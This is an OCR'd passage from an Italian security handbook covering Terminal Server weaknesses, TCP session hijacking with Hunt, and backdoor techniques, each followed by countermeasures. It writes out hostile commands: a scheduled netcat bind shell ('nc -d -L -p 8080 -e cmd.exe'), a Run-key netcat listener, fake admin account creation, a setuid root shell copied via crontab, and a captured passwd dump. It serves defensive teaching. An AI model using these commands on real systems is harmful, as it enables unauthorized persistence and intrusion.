organizzativa (OU, Organizational Unit) separata e soprattutto dare per sconta- 
to che qualsiasi utente possa conoscere la password di amministratore. Sebbene 
questa possa sembrare una visione altamente pessimistica di un ottimo strumen- 
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to come Terminal Server, i veri professionisti della sicurezza devono pensare in 
questo modo per avere successo contro le “forze oscure”; le OU sono parte inte- 
grante di Windows 2000 e sono perfettamente idonee per contribuire alla risolu- 
zione di questi problemi. 

Dovete verificare le password di ogni sistema e implementare controlli per assi- 
curarvi che la loro composizione sia conforme o migliore rispetto ai criteri pre- 
visti dalle politiche aziendali, allo scopo di impedire il rischio che possano esse- 
re semplicemente indovinate, forzate o lasciate alla pigrizia dell'utente. Occorre 
anche implementare restrizioni sugli accessi IP ricorrendo alle liste ACL a fronte 
di applicazioni, router e/o firewall: se possibile, sarebbe opportuno specificare 
gli indirizzi IP di provenienza e di destinazione. I sistemi attivi in modalità Ap- 
plication Server richiedono una sicurezza più specifica, che può essere parzial- 
mente risolta con il kit di utilità Appsec, di cui parleremo nel prosieguo del ca- 
pitolo. 


Se 


® Attacco di tipo buffer overflow 
a un controllo ActiveX di un client Web 


Diffusione: be; 
Semplicità: 3 
Impatto: 7 
Fattore di rischio: 4 


Per semplificare l'accesso ai servizi terminal, Microsoft ha fornito ai Terminal Server 
dotati di IIS il controllo ActiveX TSAC (Terminal Services Access Control), che mette 
a disposizione i servizi terminal sulla directory /tsweb del sito Web di default del si- 
stema. 

Si noti che questo controllo non viene installato di default, e che alcune sue versio- 
ni, distribuite con Windows 2000 Terminal Server, contengono un buffer non sog- 
getto a controllo, quindi utilizzabile per l'esecuzione di codice sul client dei servizi 
terminal. Questa vulnerabilità non ha particolari effetti sulla macchina che ospita il 
Terminal Server, fino a che il controllo ActiveX TSAC non viene utilizzato dal server 
per accedere ad altri Terminal Server. Tutti i client che possiedono una versione 
non aggiornata di tale controllo sono esposti a questo tipo di attacco, Per dettagli 
tecnici su questa vulnerabilità consultate il Security Bulletin MS02-046, sul sito di 
Microsoft http://www.microsoft.com. 


O Contromisure all’attacco di tipo buffer overflow 
a un controllo ActiveX di un client Web 


A meno che non abbiate una buona ragione di lavoro, disabilitare i servizi termi- 
nal del vostro sistema, Come abbiamo appena visto, il controllo ActiveX TSAC è 
in costante comunicazione con la porta 3389, quindi l’unico vantaggio dell’ac- 
cesso Web tramite servizi terminal è che il client non necessita dell’installazione 
di un client di servizi terminal autonomo. Anziché fornire il controllo ActiveX 
TSAC, è consigliabile che il server offra al client un link dal quale scaricare un 
buon gestore di servizi. 

Se proprio non potete fare a meno del controllo ActiveX TSAC, assicuratevi di forni- 
re al client la sua versione più aggiornata. Alla pagina Web http://www.micro- 
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soft.com/windowsxp/pro/downloads/rdwebconn.asp troverete spiegato come im- 
plementare la versione di Conressione desktop remoto non vulnerabile a questo at- 
tacco. 


C) Annullamento dei criteri di protezione di gruppo 


Diffusione: 3 
Semplicità: 9 
Impatto: A 
Fattore di rischio: oo) 


Un modo per limitare il numero di applicazioni alle quali un utente di un Terminal 
Server può accedere, contenendo così l'esposizione del server agli attacchi, consiste 
nell'applicare un criterio di protezione di gruppo a tutti gli utenti autorizzati ad ac- 
cedere al Terminal Server. Per esempio, un amministratore di sistema può definire 
un criterio di protezione che consenta a un utente di accedere solo a Internet 
Explorer. 

Se sono in uso i servizi di Active Directory i criteri di protezione di gruppo si trove- 
ranno memorizzati nella risorsa condivisa sysvol del server d'accesso, che in alcuni 
casi può essere soggetta a ulteriori restrizioni alla connessione dovute alla gestione 
delle licenze: ogni accesso ai servizi terminal richiederà una connessione alla risorsa 
sysvol. Nel momento in cui viene richiesta una nuova connessione al server, ma 
non sono più disponibili connessioni alla risorsa sysvol, non ci sarà possibilità di 
verificare il criterio di protezione di gruppo, perciò il client potrà eseguire tutte le 
applicazioni disponibili sul server. 


Contromisure all’annullamento 
dei criteri di protezione di gruppo 


Le restrizioni dovute alla gestione delle licenze rispondono a precise specifiche 
progettuali della rete e sono pensate per garantire all'’amministratore che l’accesso 
da parte del client risponda fedelmente ai requisiti stabiliti dalla licenza di accesso 
al server, ma complicano la risoluzione di questa vulnerabilità. Assicuratevi che il 
server sul quale si trova la risorsa condivisa sysvol (normalmente il controller di 
Active Directory) supporti un numero di licenze tale da garantire sempre l’accesso 
a tale cartella. Potreste anche pensare di disabilitare, su questo server, il servizio 
di verifica delle licenze, se siete sicuri di essere a posto con le vostre licenze soft- 
ware. 

Come verrà precisato nel prossimo paragrafo, l’utility Appsec per la gestione delle 
risorse può essere utile per limitare il numero delle applicazioni eseguibili durante 
una sessione di servizi terminal, al posto dei criteri di protezione di gruppo. 
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Considerazioni aggiuntive sulla sicurezza 


Oltre alle contromisure che abbiamo visto finora, esistono altri strumenti che per- 
mettono di irrobustire ulteriormente il vostro ambiente. I paragrafi che seguono de- 
scrivono i programmi di utilità che dovreste tenere in considerazione quando nella 
vostra organizzazione è attivo Terminal Server. 


Appsec.exe 


Appsec consente di stabilire in modo inderogabile quali applicazioni possono esse- 
re eseguite nel contesto della modalità Terminal Server, con il massimo livello di 
precisione. Questa funzionalità è estremamente importante per impedire gli attacchi 
di alterazione dei privilegi. Gli amministratori possono aggiungere applicazioni spe- 
cifiche che saranno eseguite, nonché tenere traccia di ciò che viene chiamato ed 
eseguito, nell’ottica di assicurare agli utenti finali la possibilità di svolgere i loro 
compiti. Questo è un programma di utilità che dovrebbe essere alla base di qualsia- 
si configurazione di application server. 

Tuttavia, ci sono delle considerazioni da fare. In primo luogo, se gli utenti possono 
modificare l'applicazione, possono anche ignorare i controlli che avete istituito. 
Non è previsto nessun algoritmo o hash efficace per il controllo dell'integrità dei 
programmi. La seconda considerazione riguarda le possibilità offerte dall'applica- 
zione in esecuzione. Se si tratta per esempio di un'applicazione Office che prevede 
la possibilità di eseguire macro, tali macro saranno eseguite in un contesto di utente 
o di SYSTEM, il che potrebbe portare al completo danneggiamento dell'host. 


Tsver.exe 


Tsver.exe permette agli amministratori di impedire l’accesso al Terminal Server da 
parte di identificativi di versioni distribuite (i cosiddetti build) non autorizzati. Le 
connessioni effettuate da build non autorizzati sono interrotte ed è possibile perso- 
nalizzare i messaggi di notifica dell’evento all'utente remoto: messaggi “creativi” po- 
trebbero informare che la licenza del Terminal Server è scaduta, oppure che il ser- 
ver non è stato configurato per login remoti. 

Volendo esagerare, con alcune modifiche ai client locali potete creare build “im- 
possibili” che solo voi potete distribuire: questa caratteristica è ottima nel caso sia- 
te amministratori di un piccolo numero di server e vogliate impedire che gli utenti 
interni si connettano. Un altro beneficio di Tsver è che quando si attiva il pro- 
gramma in modalità predefinita c'è la possibilità di avere il nome e l'indirizzo IP 
dell'host hacker registrato in log. 

Esattamente come la tecnologia, anche la complessità degli attacchi avanza. Il Ter- 
minal Server è un grande strumento, ma rappresenta anche un componente critico 
per la sicurezza della vostra rete, in caso di implementazioni povere o di utenti 
poco serupolosi. Ricordate che ogni computer è in un certo modo come un’auto- 
mobile: se non lo si sottopone alla manutenzione corretta, darà dei problemi. 


Risorse 


Controllo remoto 521 


La tabella seguente elenca le diverse risorse occorrenti per comprendere a fondo i 
problemi di sicurezza relativi al Terminal Server. 


Risorsa 


Note tecniche aziendali, bollettini 
e aggiornamenti Microsoft 


“Simplified Chinese IME State Recognition” 


“RDP 5.0 DoS vulnerability” 


“Named Pipe Impersonation” 
(privilege escalation) 


“Network DDE Agent Requests” 
(privilege escalation) 


“Share Level Security and Terminal Server” 
“RegAPI.DLL Buffer Overflow” 
Liste di controllo e strumenti Microsoft 


Terminal Server Deployment 


Configurazione di sicurezza in Terminal Server 


Strumenti Microsoft 
Appsec.exe 


Tsreg.exe 


Tsver.exe 


Strumenti freeware 
TSProbe.exe 
TSEnum.exe 


Disponibilità 


http://www.microsoft.com/technet 
/treeview/default.asp?url=/ 
technet/security/bulletin/ 
MS00-069.asp 


http://www.microsoft.com/technet 
/treeview/default.asp?url=/ 
technet/security/bulletin/ 
MS01-006.asp 


http://ww.microsoft.com/technet 
/treeview/default.asp?url=/ 
technet/security/bulletin/ 
MS00-053.asp 
http://ww.microsoft.com/technet 
/treeview/default.asp?url=/ 
technet/security/bulletin/ 
MS01-007.asp 


http://support.microsoft.com/ 
support/kb/articles/Q0260/8/53.ASP 
http://download.microsoft.com/ 
download/winntterminal/Patch/ 
q277910/NT4/EN-US/0277910i.EXE 


http://www.microsoft.com/technet 
/treeview/default.asp?url=/ 
Taormen: predaaomazietaconanete 
serv/reskit/deploy/part4/chapt -16 
. asp 


http://support.microsoft.com/ 
support/kb/articles/Q0260/8/53.ASP 


Windows 2000 Resource Kit 
(ftp://ftp.microsoft.com/bussys 
/winnt/winnt-public/reskit/) 
Windows 2009 Resource Kit 
(ftp://ftp.microsoft.com/bussys 
/winnt/winnt-public/reskit/) 
Windows 2009 Resource Kit 
(ftp://ftp.microsoft.com/bussys 
/winnt/winnt-public/reskit/) 


www.HammerofGod.com 
www .HammerofGod.com 


Capitolo 14 
Tecniche avanzate 


Abbiamo percorso parecchia strada per arrivare a questo capitolo. Ma per quanto ci 
siamo sforzati di mantenere un'organizzazione coerente nella presentazione delle 
tecniche e dei tool più diffusi tra gli hacker, restano alcuni elementi che sfuggono a 
qualsiasi classificazione adottata finora. Molti di questi attacchi sono illustrati in 
questo capitolo dedicato alle tecniche avanzate, A grandi linee li possiamo suddivi- 
dere nelle parti seguenti: dirottamento di sessioni, backdoor, trojan, crittografia, 
sovvertimento dell'ambiente di sistema e ingegneria sociale. 

Abbiamo incluso sotto queste voci anche materiale già proposto in altri capitoli, 
laddove ci è sembrato importante riproporlo. Ne è risultata una raccolta piuttosto 
esauriente di informazioni su questi argomenti, trasversale rispetto alle categorie di 
software, ai tipi di piattaforma e alle tecnologie. In fin dei conti, gli hacker fanno ra- 
ramente distinzioni di questo tipo quando si tratta di selezionare un bersaglio. 


Dirottamento di sessioni 


Se i pacchetti sono il sangue della rete, i dispositivi al suo interno ne costituiscono 
sicuramente il cuore e le arterie. I dispositivi di rete sono i guardiani del traffico 
aziendale e assicurano che ogni pacchetto raggiunga la propria destinazione. Ogni 
e-mail, file, numero di carta di credito di un cliente viaggia sulla rete e viene gestito 
da queste periferiche. Ovviamente la loro sicurezza è un fattore critico, poiché sen- 
za un livello di sicurezza adeguato e una meticolosa attenzione un intruso malinten- 
zionato potrebbe essere in grado di dirottare il traffico di rete. Spiegheremo come 
questo sia possibile utilizzando la tecnica denominata “hijacking” (dirottamento 
TCP). 

L’arte del dirottamento TCP nasce da una svista fondamentale fatta in sede di defini- 
zione del protocollo TCP/IP: viene consentita l'introduzione in un flusso di un pac- 
chetto contraffatto, il che permette l’esecuzione di comandi su un host remoto. Tut- 
tavia, questo tipo di attacco richiede la condivisione di risorse e un pizzico di fortu- 
na. Utilizzando uno strumento di dirottamento come Hunt, un intruso può tentare 
di rilevare una connessione ed eventualmente prenderne il controllo. 
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® Hunt 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 


1] tool Hunt, che è disponibile all'indirizzo http://lin.fsid.cvut.cz/-kra/index 
. hntml#HUNT, è un altro programma di dirottamento e presenta funzionalità più sta- 
bili. Il suo autore, Pavel Krauz, ha realizzato un prodotto veramente notevole, che 
dimostra alcuni punti deboli del protocollo TCP. 

Come potete vedere nel seguente esempio, Hunt permette all’aggressore di spiare 
una connessione alla ricerca di informazioni preziose come le password: 


- Main Menu --- revpkt 1498, free/alloc pkt 63/64 ------ 
1/w/r) list/watch/reset connections 
U) host up tests 
a) arp/simple hijack (avoids ack storm if arp used) 
Ss) simple hijack 
d) daemons rst/arp/sniff/mac 
o) options 
x) exit 
> W 
0) 172.29.11.207 [1038] --> 172.30.52.69 [23] 
1) 172.29.11.207 [1039] --> 172.30.52.69 [23] 
2) 172.29.11.207 [1040] --> 172.30.52.66 [23] 
3) 172.29.11.207 [1043] --> 172.30.52.73 [23] 
4) 172.29.11.207 [1045] --> 172.30.52.74 [23] 
5) 172.29.11.207 [1047] --> 172.30.52.74 [23] 


choose conn> 2 

dump [s]rc/[d]st/[b]oth [b]> s 
CTRL-C to break 

uname -a 

su 

hello 

cat /etc/passwd 


L'osservazione di una connessione telnet su sistemi UNIX può rivelare agli intrusi in- 
formazioni preziose, per esempio la password dell'utente root (come abbiamo appe- 
na visto). Hunt permette anche di inviare comandi per l'esecuzione sul sistema remo- 
to. Per esempio, l'aggressore è in grado di inviare comandi visualizzando il risultato 
solo sulla propria postazione, il che rende l'intrusione più difficile da intercettare. 


--- Main Menu --- revpkt 76, free/alloc pkt 63/64 ------ 
1/w/r) list/watch/reset connections 

U) host up tests 

a) arp/simple hijack (avoids ack storm if arp used) 
Ss) simple hijack 

d) daemons rst/arp/sniff/mac 

0) options 

x) exit 


> s 
9) 172.29.11.207 [1517] --> 192.168.40.66 [23] 


pr— 
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choose conn> 0 

dump connection y/n [n]> n 

dump [s]rc/[d]st/[b]oth [b]> 

print src/dst same characters y/n [n]> 

Enter the command string you wish executed or [cr]> cat /etc/passwd 
cat /etc/passwd 
root:rhayr1.AHfasd:0:1:Super-User:/:/sbin/sh 
daemon:x:1:1::/: 

bin:x:2:2::/usr/bin: 

SYS:x:9:3::/: 

adm:x:4:4:Admin:/var/adm: 

lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 
nobody :x:60001:60001:Nobody:/: 
noaccess:x:60002:60002:No Access User:/: 
nobody4:x:65534:65534:Sun0s 4.x Nobody:/: 
sm:a401]a8gfFla.;:100:1::/export/home/sm:/bin/sh 
[r]eset connection/[s]ynchronize/[n]one [r]> n 
done 


Come potete vedere, è possibile inviare un comando piuttosto pericoloso (cat 
Jetc/passwd) al sistema remoto, che lo esegue, mentre l'output è visibile solo sul 
sistema dell'intruso, 


Contromisure al dirottamento 


L'adozione di protocolli di comunicazione con cifratura, come per esempio IPSec e 
SSH, riduce notevolmente o elimina l’efficacia degli attacchi per intercettazione 
come il dirottamento delle sessioni. Sebbene le tecnologie basate sull'utilizzo di reti 
commutate fossero considerate un tempo un efficace sistema di protezione contro 
questi tipi di attacchi, gli strumenti di monitoraggio della rete (comunemente chia- 
mati sniffer) sono diventati sufficientemente astuti da consentire di aggirare in alcu- 
ni casi la protezione offerta dall'impiego di tecnologie di switch (si veda la descri- 
zione di dsniff nel Capitolo 7). La cifratura è pertanto la miglior difesa. 


Backdoor 


Una volta che un intruso ha piantato le tende, liberare il sistema dalla sua presenza 
può rivelarsi complesso. Si può anche riuscire a identificare e tappare la prima falla, 
ma un hacker esperto è in grado di creare altri metodi per garantirsi il rientro a vo- 
lontà: si tratta delle cosiddette backdo0or, letteralmente porte di servizio. 

Trovare ed eliminare dal sistema eventuali backdoor è un'impresa che rasenta l’im- 
possibile, perché esistono infiniti modi per crearle: l’unico vero rimedio è ripristinare 
il sistema operativo dai supporti originali e avere la pazienza di recuperare i dati degli 
utenti e gli applicativi da copie di sicurezza “pulite”. Questa operazione è molto difti- 
cile, soprattutto se il sistema presenta configurazioni particolari non documentate. 
Nei prossimi paragrafi considereremo i principali meccanismi utilizzati da hacker 
malintenzionati per mantenere il controllo dei sistemi target, in modo tale da con- 
sentire agli amministratori di identificare rapidamente queste intrusioni e risparmiar- 
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si il più possibile il complicato processo di ripristino della macchina. Dove possibile 
cercheremo di entrare nei dettagli, ma in generale ci proponiamo di presentare una 
panoramica delle tecniche più utilizzate, per migliorarne la comprensione. 


® Creazione di account utente falsi 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Ogni amministratore di sistema sa che gli account di livello superutente (root, Ad- 
ministrator, Admin) sono risorse critiche, da controllare e difendere. Decisamente 
più complicato è riconoscere eventuali account con nomi non significativi a cui sia- 
no stati assegnati privilegi di questo tipo. Sicuramente, una delle prime operazioni 
che un hacker malintenzionato cercherà di portare a termine una volta conquistato 
un sistema è la creazione di account come questi. 


NT/2000 


Creare account privilegiati in Windows NT/2000 è facile, basta utilizzare i seguenti 
comandi: 


net user <username> <password> /ADD 
net localgroup <groupname> <username> /ADD 


Il comando net group aggiunge un utente al gruppo globale. Ricordate che Win- 
dows NT/2000 distingue tra gruppi locali (che risiedono solo nel SAM [Security Ac- 
counts Manager] locale) e globali (che risiedono nel SAM del dominio). I gruppi lo- 
cali predefiniti sono in genere anche quelli più potenti in quanto, come impostazio- 
ne predefinita, dispongono di diversi livelli di accesso alle risorse del sistema. Win- 
dows 2000 aggiunge qualcosa di nuovo, con l'introduzione del concetto di gruppi 
universali e di gruppi /ocali di dominio, che sono metadomini che possono far par- 
te di tutti i domini di un albero o di una foresta. 

Utilizzando i comandi net [local] group è possibile verificare l'appartenenza dei 
gruppi di amministrazione principali, come dimostrato nel seguente esempio, in cui 
vengono visualizzati i membri del gruppo Admins di un sistema Windows 2000 En- 
terprise: 


C:\>net group "Enterprise Admins" 


Group name Enterprise Admins 

Comment Designated administrators of the enterprise 
Members 

Administrator 


The command completed successfully. 


I gruppi critici da tenere sotto controllo sono quelli predefiniti: Administrators, Do- 
main Admins, Enterprise Admins e Schema Admins (nei controllori di dominio Win- 
dows 2000) e i vari gruppi Operators locali. 
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UNIX 


La creazione e l’identificazione di account UNIX falsi avviene in modo analogo. Un 
approccio piuttosto comune è creare un account utente apparentemente innocuo 
con UID o GID (Group IDentifier) pari a 0. Verificate anche eventuali account con 
lo stesso GID dell’utente root, quindi verificate nel file dei gruppi, /etc/groups, 
per controllare la stessa proprietà GID. Questi account possono essere facilmente 
identificati nel file /etc/passwd. 


Novell 


L'approccio tipico nel caso di NetWare è creare oggetti “orfani”, per esempio creare 
un contenitore con un utente, quindi impostare il nuovo utente come unico gestore 
dei trust del contenitore di livello superiore. Neanche l'utente Admin è in grado di 
rimediare a questa situazione, che garantisce all’intruso la possibilità di ricollegarsi 
all'infinito all'albero NDS. Per maggiori informazioni sulle backdoor sotto NetWare, 
vi rimandiamo al Capitolo 6. 


® File di avvio 


Diffusione: 9 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Nei capitoli precedenti ci siamo dilungati sulla realizzazione di backdoor sfruttando 
i diversi meccanismi di avvio di alcune piattaforme: si tratta di uno dei traguardi 
maggiormente perseguiti dagli intrusi, perché la trappola creata viene ripristinata a 
ogni riavvio della macchina da parte dell'utente ignaro. 


NT/2000 


Le aree critiche da verificare in Windows sono le varie cartelle Startup (o Esecuzio- 
ne automatica), sotto %systemroot%\profiles\%username%\start menu\programs 
\startup (o %systemroot%\profiles\%username%\menu avvio\programmi\esecu- 
zione automatica). Inoltre, per lanciare un trojan o una backdoor a ogni riavvio 
della macchina, l'aggressore può utilizzare alcune chiavi del Registro di sistema, Le 
chiavi da controllare sono: 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ 

. Run 

.. RunOnce 

. RunOnceEx 

... RunServices (solo Win 9x) 

. AeDebug 

... Winlogon 

Una grande quantità di software potenzialmente pericolosi si installano in queste posi- 
zioni. Per esempio, Back Orifice 2000 (BO2K, si veda più avanti) si installa sotto forma 
di servizio con il nome “Remote Administration Service” sotto la chiave RunServices. 
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Abbiamo anche visto l’utilizzo di driver caricati all'avvio del sistema, utilizzati per 
creare backdoor. Il driver IKS Unvisible Keylogger Stealth) di Amecisco (iks.sys, 
opportunamente rinominato) può venire copiato nella directory %systemroot%\ 
system32\drivers e caricare il programma insieme al kernel di Windows. Questo 
processo è praticamente invisibile all'utente che utilizza la console di sistema: il dri- 
ver scrive diversi valori nel Registro di sistema, all’interno di HKLM\SYSTEM\Cur- 
rentControlSet\Services\iks (anche in questo caso il nome della chiave iks può esse- 
re cambiato nel nome del driver scelto dall’hacker). Se è disponibile un file immagi- 
ne affidabile del Registro di sistema (ottenuto utilizzando uno strumento come 
DumpReg di Somarsoft), le impostazioni IKS possono essere facilmente identificate. 
Il file del driver espone inoltre le sue origini, se si esaminano le sue proprietà in 
Explorer (Gestione risorse). 


Utilizzo della pagina di avvio di un browser Web per scaricare il codice 


Lo script Visual Basic del worm ILOVEYOU, reso pubblico nel maggio 2000, dimo- 
stra come sia possibile lanciare un eseguibile da una posizione insolita: la pagina di 
avvio di un browser web. 

In particolare, il worm ILOVEYOU modifica le impostazioni della pagina di avvio di 
Internet Explorer, in modo da farlo puntare a una pagina che esegue il download di 
un eseguibile denominato WIN-BUGSFIX.exe. In particolare, viene selezionato in 
modo casuale uno tra quattro URL diversi aventi l'aspetto generale seguente: 


http://ww.skyinet.net/-[variabile]/[lunga_stringa_di caratteri_ 
senza _senso]/WIN-BUGSFIX.exe 


Questo URL viene scritto nella chiave di Registro HKCU\Sofiware\Microsoft\Inter- 
net Explorer\Main\Start Page. Inoltre, il worm modifica un certo numero di chiavi 
di Registro, compresa quella che esegue il file eseguibile scaricato quando il sistema 
viene riavviato e un’altra che elimina l'impostazione originale della pagina di avvio. 


HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX 
HKCU\Software\Microsoft\InternetExplorer\Main\StartPage\about:blank 


Naturalmente, a seconda del livello di ingenuità dell’utente successivo che lancia il 
browser, è possibile che il file venga eseguito senza richiedere il riavvio del sistema. 
Come impostazione predefinita, le ultime versioni di Internet Explorer visualizzano 
un finestra di dialogo di avviso per l'utente, quando viene eseguito il download di 
certi tipi di file, come per esempio .EXE e .COM, che possono eseguire comandi. A 
seconda del tipo di opzione selezionata dall’utente nella finestra di dialogo mostrata 
nella Figura 14.1, all'avvio del browser Web il file potrebbe essere eseguito imme- 
diatamente. 


© Contromisura: non avviate i file scaricati da Internet! 


Va da sé (anche se è stato ripetuto diverse volte nel corso degli anni) che è necessa- 
rio prestare particolare attenzione ai file eseguibili scaricati da Internet. Avviare un 
file dalla sua postazione remota significa andare in cerca di guai: scaricatelo local- 
mente, verificate se non contiene virus, analizzate il suo contenuto quando è possi- 
bile (per esempio nel caso di file script o batch) e provatelo prima su un sistema 
non critico (non di produzione). 
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File Download 


You have chosen to download a file from this location. 
test.bat from 192.168.234.220 


What would pou like to do with this file? 
© Runthis program from its current location 


I Llways ask before openina this tipe of file 


Cancel | More Info_| 


Figura 14.1 


La finestra File Download di Internet Explorer chiede agli utenti se desiderano scaricare 
o eseguire un file remoto: selezionate sempre l'opzione Save this program to disk. 


UNIX 


In UNIX i file più utilizzati dagli intrusi per installare backdoor sono quelli di esten- 
sione rc.d: assicuratevi di verificare l'assenza in tutti i file rc di programmi scono- 
sciuti, o aggiunti di recente. Il file inetd.conf è un altro possibile nascondiglio per 
trappole: esso definisce la configurazione di inetd, il superserver Internet in UNIX, 
che a sua volta esegue dinamicamente, secondo necessità, una serie di programmi 
come FTP, telnet, finger e così via. Al suo interno potreste trovare altri daemon so- 
spetti. 

Un'altra soluzione che permette di intercettare le modifiche ai file di sistema UNIX o 
Windows è rappresentata dal popolare programma Tripwire (http://ww.trip- 
wire.com). Esistono versioni commerciali di Tripwire per Windows, Red Hat Linux 
e Solaris. Questo prodotto crea impronte dei file, che vengono conservate fuori li- 
nea: se uno dei file controllati viene modificato senza il vostro intervento, Tripwire 
è in grado di dire con certezza quando e in che modo. 


Novell 


I file startup.ncf e autoexec.ncf di NetWare stabiliscono quali programmi del ser- 
ver, parametri e NLM (NetWare Loadable Module) debbano essere lanciati all'avvio 
del server. Un intruso potrebbe modificare uno dei tanti file .NCF richiamati all’in- 
terno di questi file di avvio (per esempio ldremote.ncf), inserendo una propria 
backdoor, sotto forma di versione modificata del programma rconsole. Di conse- 
guenza, a meno che non controlliate periodicamente ogni singolo file di avvio, ri- 
schiate di tralasciare qualche backdoor. 
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® Attività pianificate 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


I file di avvio sono un eccellente nascondiglio per le backdoor, ma la stessa cosa 
vale per le code di pianificazione delle attività. In Windows questa funzionalità è 
gestita dal servizio Schedule (Pianificazione), avviato dal comando at. Installando 
una backdoor che viene periodicamente lanciata, l’intruso si garantisce che un ser- 
vizio vulnerabile sia sempre in esecuzione, disponibile a essere manipolato. 

Per esempio, in Windows NT/2000 una semplice backdoor potrebbe essere rappre- 
sentata da un listener di netcat, avviato tutti i giorni a un’ora prestabilita: 


C:\> at \\192.168.202.44 12:00A /every:1 ““nc -d -L -p 8080 -e cmd.exe"" 
Added a new job with job ID = 2 


In questo modo verrebbe lanciata una nuova istanza del listener sulla porta 8080, 
ogni giorno a mezzogiorno. All’intruso non resta che collegarsi utilizzando netcat 
per ottenere una shell di comando, e ricordarsi di eliminare periodicamente i liste- 
ner in eccesso. In alternativa, si potrebbe realizzare un file batch che verifichi se 
netcat è già in ascolto prima di lanciare una nuova istanza del listener. 

Nei sistemi UNIX, il programma crontab è il cuore della pianificazione: viene spes- 
so utilizzato per automatizzare attività di manutenzione del sistema particolarmente 
laboriose, ma può anche essere sfruttato per avviare backdoor non autorizzate. Sul- 
la maggior parte dei sistemi UNIX, per modificare il file crontab è sufficiente lan- 
ciare il comando crontab -e, che apre il file nell’editor prescelto (solitamente spe- 
cificato nella variabile d'ambiente VISUAL o EDITOR). Più semplicemente, altri si- 
stemi consentono la modifica diretta del file con vi o emacs. 

Una delle backdoor più diffuse tra quelle che utilizzano crontab funziona su siste- 
mi che lo eseguono come root, richiamando file batch. Un aggressore potrebbe ren- 
dere i batch a scrittura pubblica, aprendosi la strada per il ritorno nel sistema e ga- 
rantendosi l’accesso immediato come root. Per ottenere questo risultato si usa 
crontab, inserendo i seguenti comandi per creare una shell setUID come root: 


cp /bin/csh /tmp/evilsh 
chmod 4777 /tmp/evilsh 


DD Contromisure per le attività pianificate 


Per contrastare attacchi di questo tipo in Windows, verificate se tra le attività piani- 
ficate con il comando at risultino operazioni non previste: 


C:\> at 
Status ID Day Time Command Line 


Q Eachi 12:00 AM net localgroup administrators joel /add 
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Per eliminare il comando dubbio con ID=0: 


C:\> at \\172.29.11.214 @ /delete 


L'alternativa è semplicemente disattivare il servizio, eseguendo il comando net 
stop schedule, quindi modificare le modalità di avvio del servizio nel Pannello di 
controllo. 

In UNIX è possibile correggere la presenza nei file di crontab di comandi non pre- 
visti, ma vale certamente la pena verificare anche i diritti di accesso utilizzati sui file 
e sugli script. 


Controllo remoto 


Diffusione: 9 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9 


Pur avendo a disposizione le credenziali corrette, un intruso non riuscirebbe a rein- 
trodursi nel sistema target se un'applicazione server non gli presentasse la richiesta 
di login. Per esempio, conoscere la password dell’utente root è praticamente inutile 
se sul server di destinazione sono stati disattivati i servizi r- o telnet. Analogamen- 
te, l'impostazione standard per l'utente Administrator di Windows NT/2000 garanti- 
sce ben poche possibilità di controllo remoto. Quindi, uno degli obiettivi principali 
degli aggressori sarà lasciare sul posto qualche meccanismo che semplifichi il rien- 
tro in un secondo tempo. 

Nella maggior parte dei casi, tutto quello che serve all’intruso è un prompt dei comandi 
remoto. Vedremo alcuni tool che permettono di creare shell remote con relativa facilità. 
Con l'affermarsi dei sistemi operativi grafici e vista la semplicità di gestione che ga- 
rantiscono, una backdoor che assicuri il controllo remoto con interfaccia grafica sa- 
rebbe proprio il massimo. Vedremo anche alcuni strumenti in grado di offrire que- 
sta funzionalità. 

Rimandiamo la discussione sulle contromisure per il controllo remoto alla fine di 
questo paragrafo, dato che molti dei meccanismi di difesa sono simili. 


netcat 


Abbiamo già parlato diverse volte del cosiddetto “coltellino svizzero del TCP/IP” 
conosciuto con il nome di netcat (trovate le versioni per Windows all’indirizzo 
http://packetstormsecurity.org/Win/nctint.zip, mentre quella per UNIX 
è disponibile alla pagina http://packetstormsecurity.org/UNIX/utilities/ 
ne110.tgz) e della sua abilità nell’ascoltare una certa porta senza interagire con 
essa, effettuando un'operazione prestabilita quando viene richiesta una connes- 
sione da remoto. 

netcat può rivelarsi uno strumento di controllo remoto estremamente potente, 
se si sceglie come azione predefinita di lanciare una shell di comando: in tal ca- 
so, un intruso può utilizzare netcat per collegarsi alla porta e vedersi restituire 
sulla propria macchina il prompt dei comandi. I comandi nascosti per lanciare 
netcat in modalità di ascolto vengono solitamente mischiati agli altri in qualche 
file di avvio (si veda il paragrafo precedente), in modo tale che il listener si ri- 
pristini al riavvio della macchina. 
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La Figura 14.2 riporta un esempio di backdoor di questo tipo e mostra un valore 
all’interno del Registro di sistema di Windows che lancia un listener di netcat 
all'avvio. 


“C:\TEMP\NC11NT\nc -L -d-e cmd.exe -p d060" 
“SysTray Exe" 


si ci PARE 


Figura 14.2 
La configurazione del Registro di sistema di NT4 per lanciare netcat in ascolto a ogni avvio, 


L'opzione -L di netcat indica al listener di mantenere le sessioni anche in caso di 
interruzione della connessione, -d lancia netcat in modalità stealth (senza la con- 
sole interattiva), mentre -e specifica il programma da eseguire, in questo caso 
cmd.exe, all'interprete dei comandi di Windows. L'opzione -p specifica la porta su 
cui ascoltare (in questo caso, la 8080). 

La versione UNIX di netcat può essere facilmente configurata per eseguire /bin/sh 
su un sistema UNIX, ottenendo un risultato analogo: a questo punto, tutto quello 
che resta da fare all'hacker è collegarsi alla porta in ascolto, utilizzando netcat per 
ottenere una shell di comando remota. 


Hacker molto intelligenti nascondono il loro trojan netcat dietro nomi ap- 
parentemente innocui come ddedl132.exe o qualcosa di ugualmente non 
preoccupante, per costringere l'utente a riflettere un po’ prima di procedere 
alla cancellazione. 


remote.exe (NT) 


L'utility remote contenuta nel Resource Kit di Windows NT/2000 può essere esegui- 
ta sul sistema target in modalità server e restituisce una shell di comando a qualsiasi 
utente autenticato connesso con il corrispondente client remoto, 
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L'installazione è quasi banale (è sufficiente copiare remote.exe in una posizione 
all’interno del percorso di ricerca del sistema remoto, come %systemroot%) e spesso 
serve semplicemente come punto di partenza per installare strumenti ben più dan- 
